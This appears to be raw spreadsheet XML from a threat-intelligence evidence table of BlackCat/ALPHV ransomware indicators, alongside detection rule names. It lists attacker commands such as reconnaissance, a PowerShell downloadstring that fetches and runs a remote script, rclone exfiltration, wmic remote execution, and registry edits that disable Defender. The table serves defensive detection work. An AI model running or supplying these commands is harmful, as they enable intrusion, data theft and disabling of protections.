    <t>looking for the Domain-DNS Class(object) — Schema GUID: 19195a5b-6da0–11d0-afd3–00c04fd930c9 and DS-Replication-Get-Changes-All — Schema GUID: 1131f6ad-9c07–11d1-f79f-00c04fc2dcd2 as explained in this SpectreOps post, to detect this dcsync activity. Using these two points of evidence, we can say with good confidence that the threat actor performed a dcsync operation.</t>
  </si>
  <si>
    <t>systeminfo</t>
  </si>
  <si>
    <t>net config workstation</t>
  </si>
  <si>
    <t>nltest /domain_trusts /all_trusts</t>
  </si>
  <si>
    <t>ipconfig-pid</t>
  </si>
  <si>
    <t>net view /all /domain</t>
  </si>
  <si>
    <t>net view /all</t>
  </si>
  <si>
    <t>net group "Domain Admins" /domain</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' nltest /dclist ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' net group "domain admins" /domain''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' net group "Domain Computers" /domain''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' net group "enterprise admins" /domain''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>nltest  /dclist:</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' route print ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' systeminfo ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' ipconfig /all ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>net  group "domain admins" /domain</t>
  </si>
  <si>
    <t>net  group "Domain Computers" /domain</t>
  </si>
  <si>
    <t>net  group "enterprise admins" /domain</t>
  </si>
  <si>
    <t>quser</t>
  </si>
  <si>
    <t>ipconfig  /all</t>
  </si>
  <si>
    <t>net  group "domain computers" /domain</t>
  </si>
  <si>
    <t>route  print</t>
  </si>
  <si>
    <t>C:\users\&lt;&gt;\Desktop\netscan.exe</t>
  </si>
  <si>
    <t>C:\users\&lt;&gt;\Desktop\64-bit\netscan.exe</t>
  </si>
  <si>
    <t>scan 445, 3389, 135</t>
  </si>
  <si>
    <t>confucius_cpp.exe</t>
  </si>
  <si>
    <t>(&amp;(objectClass=computer))</t>
  </si>
  <si>
    <t>Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) &amp; "c:\programdata\rcl.bat" &amp; Chr(34), 0
Set WshShell = Nothing</t>
  </si>
  <si>
    <t>rclone config</t>
  </si>
  <si>
    <t>rclone copy</t>
  </si>
  <si>
    <t>rclone-pid</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''XCOPY /f /y "c:\programdata\setup.exe" "\\&lt;ip&gt;\C$ ''', "intiating_process_command_line": r''' c:\windows\System32\cmd.exe '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''cmd /c wmic /node:&lt;host&gt; process call create "C:\setup.exe" ''', "intiating_process_command_line": r''' c:\windows\System32\cmd.exe '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''cmd /c wmic /node:&lt;host&gt; process call create "C:\programdata\&lt;random&gt;.exe " ''', "intiating_process_command_line": r''' c:\windows\System32\cmd.exe '''}</t>
  </si>
  <si>
    <t>wmiprvSE.exe executed c:\programdata\bnufuomft2.exe on host</t>
  </si>
  <si>
    <t>8a0d153f-b4e4-4ea7-9335-892dfbe17221: NetScan Share Enumeration Write Access Check
dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f: CHCP CodePage Locale Lookup
7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee: Use of Rclone to exfiltrate data over an SSH channel
a09079c2-e4af-4963-84d2-d65c2fb332f5: Detection of CertUtil Misuse for Malicious File Download
6f77de5c-27af-435b-b530-e2d07b77a980: Impacket Tool Execution
6fc673ac-ec2f-4de8-8a14-a395f1b2b531: Potential CSharp Streamer RAT loading binary from APPDATA
879ddba7-5cb9-484f-88a4-c1d87034166f: Suspicious ScreenConnect Script Execution</t>
  </si>
  <si>
    <t>90f138c1-f578-4ac3-8c49-eecfd847c8b7: BITS Transfer Job Download From Direct IP</t>
  </si>
  <si>
    <t>10c14723-61c7-4c75-92ca-9af245723ad2: HackTool - Potential Impacket Lateral Movement Activity</t>
  </si>
  <si>
    <t>b1f73849-6329-4069-bc8f-78a604bb8b23: Remote Access Tool - ScreenConnect Remote Command Execution</t>
  </si>
  <si>
    <t>90b63c33-2b97-4631-a011-ceb0f47b77c3: Suspicious Execution From GUID Like Folder Names</t>
  </si>
  <si>
    <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b: Suspicious Download Via Certutil.EXE</t>
  </si>
  <si>
    <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede: File Download Via Bitsadmin</t>
  </si>
  <si>
    <t>e37db05d-d1f9-49c8-b464-cee1a4b11638: PUA - Rclone Execution</t>
  </si>
  <si>
    <t>7090adee-82e2-4269-bd59-80691e7c6338: Console CodePage Lookup Via CHCP</t>
  </si>
  <si>
    <t>d5601f8c-b26f-4ab0-9035-69e11a8d4ad2: CobaltStrike Named Pipe</t>
  </si>
  <si>
    <t>c8557060-9221-4448-8794-96320e6f3e74: Windows PowerShell User Agent</t>
  </si>
  <si>
    <t>1edff897-9146-48d2-9066-52e8d8f80a2f: Suspicious Invoke-WebRequest Execution With DirectIP</t>
  </si>
  <si>
    <t>0ef56343-059e-4cb6-adc1-4c3c967c5e46: Suspicious Execution of Systeminfo</t>
  </si>
  <si>
    <t>903076ff-f442-475a-b667-4f246bcc203b: Nltest.EXE Execution</t>
  </si>
  <si>
    <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248: Potential Recon Activity Via Nltest.EXE</t>
  </si>
  <si>
    <t>624f1f33-ee38-4bbe-9f4a-088014e0c26b: IcedID Malware Execution Patterns</t>
  </si>
  <si>
    <t xml:space="preserve">ET INFO Executable Download from dotted-quad Host
ETPRO HUNTING Windows BITS UA Retrieving EXE
ET HUNTING Suspicious BITS EXE DL From Dotted Quad
ET POLICY PE EXE or DLL Windows file download HTTP
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
ETPRO HUNTING Windows BITS UA Retrieving EXE M2
ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request
ETPRO MALWARE Likely Evil Certutil Retrieving EXE
ThreatFox payload delivery (domain - confidence level: 100%)
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
ThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 80%)
ET INFO Packed Executable Download
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
ET MALWARE Cobalt Strike Beacon Observed
ET MALWARE Win32/IcedID Requesting Encoded Binary M4
ET MALWARE Win32/IcedID Request Cookie
ET SCAN Potential SSH Scan OUTBOUND </t>
  </si>
  <si>
    <t>alphv-eid0239</t>
  </si>
  <si>
    <t>alphv-eid0240</t>
  </si>
  <si>
    <t>alphv-eid0241</t>
  </si>
  <si>
    <t>alphv-eid0242</t>
  </si>
  <si>
    <t>alphv-eid0243</t>
  </si>
  <si>
    <t>alphv-eid0244</t>
  </si>
  <si>
    <t>alphv-eid0245</t>
  </si>
  <si>
    <t>alphv-eid0246</t>
  </si>
  <si>
    <t>alphv-eid0247</t>
  </si>
  <si>
    <t>alphv-eid0248</t>
  </si>
  <si>
    <t>alphv-eid0249</t>
  </si>
  <si>
    <t>alphv-eid0250</t>
  </si>
  <si>
    <t>alphv-eid0251</t>
  </si>
  <si>
    <t>alphv-eid0252</t>
  </si>
  <si>
    <t>alphv-eid0253</t>
  </si>
  <si>
    <t>alphv-eid0254</t>
  </si>
  <si>
    <t>alphv-eid0255</t>
  </si>
  <si>
    <t>alphv-eid0256</t>
  </si>
  <si>
    <t>alphv-eid0257</t>
  </si>
  <si>
    <t>alphv-eid0258</t>
  </si>
  <si>
    <t>alphv-eid0259</t>
  </si>
  <si>
    <t>alphv-eid0260</t>
  </si>
  <si>
    <t>alphv-eid0261</t>
  </si>
  <si>
    <t>alphv-eid0262</t>
  </si>
  <si>
    <t>alphv-eid0263</t>
  </si>
  <si>
    <t>alphv-eid0264</t>
  </si>
  <si>
    <t>alphv-eid0265</t>
  </si>
  <si>
    <t>alphv-eid0266</t>
  </si>
  <si>
    <t>alphv-eid0267</t>
  </si>
  <si>
    <t>alphv-eid0268</t>
  </si>
  <si>
    <t>alphv-eid0269</t>
  </si>
  <si>
    <t>alphv-eid0270</t>
  </si>
  <si>
    <t>alphv-eid0271</t>
  </si>
  <si>
    <t>alphv-eid0272</t>
  </si>
  <si>
    <t>alphv-eid0273</t>
  </si>
  <si>
    <t>alphv-eid0274</t>
  </si>
  <si>
    <t>alphv-eid0275</t>
  </si>
  <si>
    <t>alphv-eid0276</t>
  </si>
  <si>
    <t>alphv-eid0277</t>
  </si>
  <si>
    <t>alphv-eid0278</t>
  </si>
  <si>
    <t>alphv-eid0279</t>
  </si>
  <si>
    <t>alphv-eid0280</t>
  </si>
  <si>
    <t>alphv-eid0281</t>
  </si>
  <si>
    <t>alphv-eid0282</t>
  </si>
  <si>
    <t>alphv-eid0283</t>
  </si>
  <si>
    <t>alphv-eid0284</t>
  </si>
  <si>
    <t>alphv-eid0285</t>
  </si>
  <si>
    <t>alphv-eid0286</t>
  </si>
  <si>
    <t>alphv-eid0287</t>
  </si>
  <si>
    <t>alphv-eid0288</t>
  </si>
  <si>
    <t>alphv-eid0289</t>
  </si>
  <si>
    <t>alphv-eid0290</t>
  </si>
  <si>
    <t>alphv-eid0291</t>
  </si>
  <si>
    <t>alphv-eid0292</t>
  </si>
  <si>
    <t>alphv-eid0293</t>
  </si>
  <si>
    <t>alphv-eid0294</t>
  </si>
  <si>
    <t>alphv-eid0295</t>
  </si>
  <si>
    <t>alphv-eid0296</t>
  </si>
  <si>
    <t>alphv-eid0297</t>
  </si>
  <si>
    <t>alphv-eid0298</t>
  </si>
  <si>
    <t>alphv-eid0299</t>
  </si>
  <si>
    <t>alphv-eid0300</t>
  </si>
  <si>
    <t>alphv-eid0301</t>
  </si>
  <si>
    <t>alphv-eid0302</t>
  </si>
  <si>
    <t>alphv-eid0303</t>
  </si>
  <si>
    <t>alphv-eid0304</t>
  </si>
  <si>
    <t>alphv-eid0305</t>
  </si>
  <si>
    <t>alphv-eid0306</t>
  </si>
  <si>
    <t>alphv-eid0307</t>
  </si>
  <si>
    <t>alphv-eid0308</t>
  </si>
  <si>
    <t>alphv-eid0309</t>
  </si>
  <si>
    <t>alphv-eid0310</t>
  </si>
  <si>
    <t>alphv-eid0311</t>
  </si>
  <si>
    <t>alphv-eid0312</t>
  </si>
  <si>
    <t>alphv-eid0313</t>
  </si>
  <si>
    <t>alphv-eid0314</t>
  </si>
  <si>
    <t>alphv-eid0315</t>
  </si>
  <si>
    <t>alphv-eid0316</t>
  </si>
  <si>
    <t>alphv-eid0317</t>
  </si>
  <si>
    <t>alphv-eid0318</t>
  </si>
  <si>
    <t>alphv-eid0319</t>
  </si>
  <si>
    <t>alphv-eid0320</t>
  </si>
  <si>
    <t>alphv-eid0321</t>
  </si>
  <si>
    <t>alphv-eid0322</t>
  </si>
  <si>
    <t>alphv-eid0323</t>
  </si>
  <si>
    <t>alphv-eid0324</t>
  </si>
  <si>
    <t>alphv-eid0325</t>
  </si>
  <si>
    <t>alphv-eid0326</t>
  </si>
  <si>
    <t>alphv-eid0327</t>
  </si>
  <si>
    <t>alphv-eid0328</t>
  </si>
  <si>
    <t>alphv-eid0329</t>
  </si>
  <si>
    <t>alphv-eid0330</t>
  </si>
  <si>
    <t>alphv-eid0331</t>
  </si>
  <si>
    <t>alphv-eid0332</t>
  </si>
  <si>
    <t>alphv-eid0333</t>
  </si>
  <si>
    <t>alphv-eid0334</t>
  </si>
  <si>
    <t>alphv-eid0335</t>
  </si>
  <si>
    <t>alphv-eid0336</t>
  </si>
  <si>
    <t>alphv-eid0337</t>
  </si>
  <si>
    <t>alphv-eid0338</t>
  </si>
  <si>
    <t>alphv-eid0339</t>
  </si>
  <si>
    <t>alphv-eid0340</t>
  </si>
  <si>
    <t>alphv-eid0341</t>
  </si>
  <si>
    <t>alphv-eid0342</t>
  </si>
  <si>
    <t>alphv-eid0343</t>
  </si>
  <si>
    <t>alphv-eid0344</t>
  </si>
  <si>
    <t>alphv-eid0345</t>
  </si>
  <si>
    <t>alphv-eid0346</t>
  </si>
  <si>
    <t>alphv-eid0347</t>
  </si>
  <si>
    <t>alphv-eid0348</t>
  </si>
  <si>
    <t>C:\ Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c .\45.ps1</t>
  </si>
  <si>
    <t>{ "data": "2024-05", "url": "https://www.sygnia.co/blog/blackcat-ransomware/", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>powershell IEX(new-object net.webclient).downloadstring('http://&lt;domain&gt;/mdNPS/vic64.ps1')</t>
  </si>
  <si>
    <t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa</t>
  </si>
  <si>
    <t>suspicious access to lsass service</t>
  </si>
  <si>
    <t>mdeedr_alert</t>
  </si>
  <si>
    <t>suspicious 'DumpLsass' behavior was blocked</t>
  </si>
  <si>
    <t>process memory dump</t>
  </si>
  <si>
    <t>An active 'RegistryExfil' malware in a command line</t>
  </si>
  <si>
    <t>netscan</t>
  </si>
  <si>
    <t>C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sap.bat</t>
  </si>
  <si>
    <t>reg add "HKLM\Soltware\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f</t>
  </si>
  <si>
    <t>wmic /namespace:\\root\Microsoft\Windows\Defender PATH MpPreference call Add ExclusionPath</t>
  </si>
  <si>
    <t>reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f</t>
  </si>
  <si>
    <t>reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f</t>
  </si>
  <si>
    <t>reg add "HKLM\Soltware\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f</t>
  </si>
  <si>
    <t>reg add "HKLM\Soltware\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f</t>
  </si>
  <si>
    <t>alphv-eid0349</t>
  </si>
  <si>
    <t>alphv-eid0350</t>
  </si>
  <si>
    <t>alphv-eid0351</t>
  </si>
  <si>
    <t>alphv-eid0352</t>
  </si>
  <si>
    <t>alphv-eid0353</t>
  </si>
  <si>
    <t>alphv-eid0354</t>
  </si>
  <si>
    <t>alphv-eid0355</t>
  </si>
  <si>
    <t>alphv-eid0356</t>
  </si>
  <si>
    <t>alphv-eid0357</t>
  </si>
  <si>
    <t>alphv-eid0358</t>
  </si>
  <si>
    <t>alphv-eid0359</t>
  </si>
  <si>
    <t>alphv-eid0360</t>
  </si>
  <si>
    <t>alphv-eid0361</t>
  </si>
  <si>
    <t>alphv-eid0362</t>
  </si>
  <si>
    <t>alphv-eid0363</t>
  </si>
  <si>
    <t>Count of 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</si>
</sst>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pivotButton="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="7">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vey Wargo" refreshedDate="45771.642829050928" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="363" xr:uid="{EF314238-927D-3A40-BA59-D6760C14918E}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems count="363">
        <s v="alphv-eid0001"/>
        <s v="alphv-eid0002"/>
        <s v="alphv-eid0003"/>
        <s v="alphv-eid0004"/>
        <s v="alphv-eid0005"/>
        <s v="alphv-eid0006"/>
        <s v="alphv-eid0007"/>
        <s v="alphv-eid0008"/>
        <s v="alphv-eid0009"/>
        <s v="alphv-eid0010"/>
        <s v="alphv-eid0011"/>
        <s v="alphv-eid0012"/>
        <s v="alphv-eid0013"/>
        <s v="alphv-eid0014"/>
        <s v="alphv-eid0015"/>
        <s v="alphv-eid0016"/>
        <s v="alphv-eid0017"/>
        <s v="alphv-eid0018"/>
        <s v="alphv-eid0019"/>
        <s v="alphv-eid0020"/>
        <s v="alphv-eid0021"/>
        <s v="alphv-eid0022"/>
        <s v="alphv-eid0023"/>
        <s v="alphv-eid0024"/>
        <s v="alphv-eid0025"/>
        <s v="alphv-eid0026"/>
        <s v="alphv-eid0027"/>
        <s v="alphv-eid0028"/>
        <s v="alphv-eid0029"/>
        <s v="alphv-eid0030"/>
        <s v="alphv-eid0031"/>
        <s v="alphv-eid0032"/>
        <s v="alphv-eid0033"/>
        <s v="alphv-eid0034"/>
        <s v="alphv-eid0035"/>
        <s v="alphv-eid0036"/>
        <s v="alphv-eid0037"/>
        <s v="alphv-eid0038"/>
        <s v="alphv-eid0039"/>
        <s v="alphv-eid0040"/>
        <s v="alphv-eid0041"/>
        <s v="alphv-eid0042"/>
        <s v="alphv-eid0043"/>
        <s v="alphv-eid0044"/>
        <s v="alphv-eid0045"/>
        <s v="alphv-eid0046"/>
        <s v="alphv-eid0047"/>
        <s v="alphv-eid0048"/>
        <s v="alphv-eid0049"/>
        <s v="alphv-eid0050"/>
        <s v="alphv-eid0051"/>
        <s v="alphv-eid0052"/>
        <s v="alphv-eid0053"/>
        <s v="alphv-eid0054"/>
        <s v="alphv-eid0055"/>
        <s v="alphv-eid0056"/>
        <s v="alphv-eid0057"/>
        <s v="alphv-eid0058"/>
        <s v="alphv-eid0059"/>
        <s v="alphv-eid0060"/>
        <s v="alphv-eid0061"/>
        <s v="alphv-eid0062"/>
        <s v="alphv-eid0063"/>
        <s v="alphv-eid0064"/>
        <s v="alphv-eid0065"/>
        <s v="alphv-eid0066"/>
        <s v="alphv-eid0067"/>
        <s v="alphv-eid0068"/>
        <s v="alphv-eid0069"/>
        <s v="alphv-eid0070"/>
        <s v="alphv-eid0071"/>
        <s v="alphv-eid0072"/>
        <s v="alphv-eid0073"/>
        <s v="alphv-eid0074"/>
        <s v="alphv-eid0075"/>
        <s v="alphv-eid0076"/>
        <s v="alphv-eid0077"/>
        <s v="alphv-eid0078"/>
        <s v="alphv-eid0079"/>
        <s v="alphv-eid0080"/>
        <s v="alphv-eid0081"/>
        <s v="alphv-eid0082"/>
        <s v="alphv-eid0083"/>
        <s v="alphv-eid0084"/>
        <s v="alphv-eid0085"/>
        <s v="alphv-eid0086"/>
        <s v="alphv-eid0087"/>
        <s v="alphv-eid0088"/>
        <s v="alphv-eid0089"/>
        <s v="alphv-eid0090"/>
        <s v="alphv-eid0091"/>
        <s v="alphv-eid0092"/>
        <s v="alphv-eid0093"/>
        <s v="alphv-eid0094"/>
        <s v="alphv-eid0095"/>
        <s v="alphv-eid0096"/>
        <s v="alphv-eid0097"/>
        <s v="alphv-eid0098"/>
        <s v="alphv-eid0099"/>
        <s v="alphv-eid0100"/>
        <s v="alphv-eid0101"/>
        <s v="alphv-eid0102"/>
        <s v="alphv-eid0103"/>
        <s v="alphv-eid0104"/>
        <s v="alphv-eid0105"/>
        <s v="alphv-eid0106"/>
        <s v="alphv-eid0107"/>
        <s v="alphv-eid0108"/>
        <s v="alphv-eid0109"/>
        <s v="alphv-eid0110"/>
        <s v="alphv-eid0111"/>
        <s v="alphv-eid0112"/>
        <s v="alphv-eid0113"/>
        <s v="alphv-eid0114"/>
        <s v="alphv-eid0115"/>
        <s v="alphv-eid0116"/>
        <s v="alphv-eid0117"/>
        <s v="alphv-eid0118"/>
        <s v="alphv-eid0119"/>
        <s v="alphv-eid0120"/>
        <s v="alphv-eid0121"/>
        <s v="alphv-eid0122"/>
        <s v="alphv-eid0123"/>
        <s v="alphv-eid0124"/>
        <s v="alphv-eid0125"/>
        <s v="alphv-eid0126"/>
        <s v="alphv-eid0127"/>
        <s v="alphv-eid0128"/>
        <s v="alphv-eid0129"/>
        <s v="alphv-eid0130"/>
        <s v="alphv-eid0131"/>
        <s v="alphv-eid0132"/>
        <s v="alphv-eid0133"/>
        <s v="alphv-eid0134"/>
        <s v="alphv-eid0135"/>
        <s v="alphv-eid0136"/>
        <s v="alphv-eid0137"/>
        <s v="alphv-eid0138"/>
        <s v="alphv-eid0139"/>
        <s v="alphv-eid0140"/>
        <s v="alphv-eid0141"/>
        <s v="alphv-eid0142"/>
        <s v="alphv-eid0143"/>
        <s v="alphv-eid0144"/>
        <s v="alphv-eid0145"/>
        <s v="alphv-eid0146"/>
        <s v="alphv-eid0147"/>
        <s v="alphv-eid0148"/>
        <s v="alphv-eid0149"/>
        <s v="alphv-eid0150"/>
        <s v="alphv-eid0151"/>
        <s v="alphv-eid0152"/>
        <s v="alphv-eid0153"/>
        <s v="alphv-eid0154"/>
        <s v="alphv-eid0155"/>
        <s v="alphv-eid0156"/>
        <s v="alphv-eid0157"/>
        <s v="alphv-eid0158"/>
        <s v="alphv-eid0159"/>
        <s v="alphv-eid0160"/>
        <s v="alphv-eid0161"/>
        <s v="alphv-eid0162"/>
        <s v="alphv-eid0163"/>
        <s v="alphv-eid0164"/>
        <s v="alphv-eid0165"/>
        <s v="alphv-eid0166"/>
        <s v="alphv-eid0167"/>
        <s v="alphv-eid0168"/>
        <s v="alphv-eid0169"/>
        <s v="alphv-eid0170"/>
        <s v="alphv-eid0171"/>
        <s v="alphv-eid0172"/>
        <s v="alphv-eid0173"/>
        <s v="alphv-eid0174"/>
        <s v="alphv-eid0175"/>
        <s v="alphv-eid0176"/>
        <s v="alphv-eid0177"/>
        <s v="alphv-eid0178"/>
        <s v="alphv-eid0179"/>
        <s v="alphv-eid0180"/>
        <s v="alphv-eid0181"/>
        <s v="alphv-eid0182"/>
        <s v="alphv-eid0183"/>
        <s v="alphv-eid0184"/>
        <s v="alphv-eid0185"/>
        <s v="alphv-eid0186"/>
        <s v="alphv-eid0187"/>
        <s v="alphv-eid0188"/>
        <s v="alphv-eid0189"/>
        <s v="alphv-eid0190"/>
        <s v="alphv-eid0191"/>
        <s v="alphv-eid0192"/>
        <s v="alphv-eid0193"/>
        <s v="alphv-eid0194"/>
        <s v="alphv-eid0195"/>
        <s v="alphv-eid0196"/>
        <s v="alphv-eid0197"/>
        <s v="alphv-eid0198"/>
        <s v="alphv-eid0199"/>
        <s v="alphv-eid0200"/>
        <s v="alphv-eid0201"/>
        <s v="alphv-eid0202"/>
        <s v="alphv-eid0203"/>
        <s v="alphv-eid0204"/>
        <s v="alphv-eid0205"/>
        <s v="alphv-eid0206"/>
        <s v="alphv-eid0207"/>
        <s v="alphv-eid0208"/>
        <s v="alphv-eid0209"/>
        <s v="alphv-eid0210"/>
        <s v="alphv-eid0211"/>
        <s v="alphv-eid0212"/>
        <s v="alphv-eid0213"/>
        <s v="alphv-eid0214"/>
        <s v="alphv-eid0215"/>
        <s v="alphv-eid0216"/>
        <s v="alphv-eid0217"/>
        <s v="alphv-eid0218"/>
        <s v="alphv-eid0219"/>
        <s v="alphv-eid0220"/>
        <s v="alphv-eid0221"/>
        <s v="alphv-eid0222"/>
        <s v="alphv-eid0223"/>
        <s v="alphv-eid0224"/>
        <s v="alphv-eid0225"/>
        <s v="alphv-eid0226"/>
        <s v="alphv-eid0227"/>
        <s v="alphv-eid0228"/>
        <s v="alphv-eid0229"/>
        <s v="alphv-eid0230"/>
        <s v="alphv-eid0231"/>
        <s v="alphv-eid0232"/>
        <s v="alphv-eid0233"/>
        <s v="alphv-eid0234"/>
        <s v="alphv-eid0235"/>
        <s v="alphv-eid0236"/>
        <s v="alphv-eid0237"/>
        <s v="alphv-eid0238"/>
        <s v="alphv-eid0239"/>
        <s v="alphv-eid0240"/>
        <s v="alphv-eid0241"/>
        <s v="alphv-eid0242"/>
        <s v="alphv-eid0243"/>
        <s v="alphv-eid0244"/>
        <s v="alphv-eid0245"/>
        <s v="alphv-eid0246"/>
        <s v="alphv-eid0247"/>
        <s v="alphv-eid0248"/>
        <s v="alphv-eid0249"/>
        <s v="alphv-eid0250"/>
        <s v="alphv-eid0251"/>
        <s v="alphv-eid0252"/>
        <s v="alphv-eid0253"/>
        <s v="alphv-eid0254"/>
        <s v="alphv-eid0255"/>
        <s v="alphv-eid0256"/>
        <s v="alphv-eid0257"/>
        <s v="alphv-eid0258"/>
        <s v="alphv-eid0259"/>
        <s v="alphv-eid0260"/>
        <s v="alphv-eid0261"/>
        <s v="alphv-eid0262"/>
        <s v="alphv-eid0263"/>
        <s v="alphv-eid0264"/>
        <s v="alphv-eid0265"/>
        <s v="alphv-eid0266"/>
        <s v="alphv-eid0267"/>
        <s v="alphv-eid0268"/>
        <s v="alphv-eid0269"/>
        <s v="alphv-eid0270"/>
        <s v="alphv-eid0271"/>
        <s v="alphv-eid0272"/>
        <s v="alphv-eid0273"/>
        <s v="alphv-eid0274"/>
        <s v="alphv-eid0275"/>
        <s v="alphv-eid0276"/>
        <s v="alphv-eid0277"/>
        <s v="alphv-eid0278"/>
        <s v="alphv-eid0279"/>
        <s v="alphv-eid0280"/>
        <s v="alphv-eid0281"/>
        <s v="alphv-eid0282"/>
        <s v="alphv-eid0283"/>
        <s v="alphv-eid0284"/>
        <s v="alphv-eid0285"/>
        <s v="alphv-eid0286"/>
        <s v="alphv-eid0287"/>
        <s v="alphv-eid0288"/>
        <s v="alphv-eid0289"/>
        <s v="alphv-eid0290"/>
        <s v="alphv-eid0291"/>
        <s v="alphv-eid0292"/>
        <s v="alphv-eid0293"/>
        <s v="alphv-eid0294"/>
        <s v="alphv-eid0295"/>
        <s v="alphv-eid0296"/>
        <s v="alphv-eid0297"/>
        <s v="alphv-eid0298"/>
        <s v="alphv-eid0299"/>
        <s v="alphv-eid0300"/>
        <s v="alphv-eid0301"/>
        <s v="alphv-eid0302"/>
        <s v="alphv-eid0303"/>
        <s v="alphv-eid0304"/>
        <s v="alphv-eid0305"/>
        <s v="alphv-eid0306"/>
        <s v="alphv-eid0307"/>
        <s v="alphv-eid0308"/>
        <s v="alphv-eid0309"/>
        <s v="alphv-eid0310"/>
        <s v="alphv-eid0311"/>
        <s v="alphv-eid0312"/>
        <s v="alphv-eid0313"/>
        <s v="alphv-eid0314"/>
        <s v="alphv-eid0315"/>
        <s v="alphv-eid0316"/>
        <s v="alphv-eid0317"/>
        <s v="alphv-eid0318"/>
        <s v="alphv-eid0319"/>
        <s v="alphv-eid0320"/>
        <s v="alphv-eid0321"/>
        <s v="alphv-eid0322"/>
        <s v="alphv-eid0323"/>
        <s v="alphv-eid0324"/>
        <s v="alphv-eid0325"/>
        <s v="alphv-eid0326"/>
        <s v="alphv-eid0327"/>
        <s v="alphv-eid0328"/>
        <s v="alphv-eid0329"/>
        <s v="alphv-eid0330"/>
        <s v="alphv-eid0331"/>
        <s v="alphv-eid0332"/>
        <s v="alphv-eid0333"/>
        <s v="alphv-eid0334"/>
        <s v="alphv-eid0335"/>
        <s v="alphv-eid0336"/>
        <s v="alphv-eid0337"/>
        <s v="alphv-eid0338"/>
        <s v="alphv-eid0339"/>
        <s v="alphv-eid0340"/>
        <s v="alphv-eid0341"/>
        <s v="alphv-eid0342"/>
        <s v="alphv-eid0343"/>
        <s v="alphv-eid0344"/>
        <s v="alphv-eid0345"/>
        <s v="alphv-eid0346"/>
        <s v="alphv-eid0347"/>
        <s v="alphv-eid0348"/>
        <s v="alphv-eid0349"/>
        <s v="alphv-eid0350"/>
        <s v="alphv-eid0351"/>
        <s v="alphv-eid0352"/>
        <s v="alphv-eid0353"/>
        <s v="alphv-eid0354"/>
        <s v="alphv-eid0355"/>
        <s v="alphv-eid0356"/>
        <s v="alphv-eid0357"/>
        <s v="alphv-eid0358"/>
        <s v="alphv-eid0359"/>
        <s v="alphv-eid0360"/>
        <s v="alphv-eid0361"/>
        <s v="alphv-eid0362"/>
        <s v="alphv-eid0363"/>
      </sharedItems>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems containsBlank="1" count="15">
        <s v="generic"/>
        <s v="htool"/>
        <s v="c2"/>
        <s v="cmdline"/>
        <s v="file_path"/>
        <s v="named_pipe"/>
        <s v="mdeav_alert"/>
        <s v="kql"/>
        <s v="spawn"/>
        <s v="object"/>
        <s v="sigma_dfir"/>
        <s v="sigma"/>
        <s v="etpro"/>
        <m/>
        <s v="mdeedr_alert"/>
      </sharedItems>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="10">
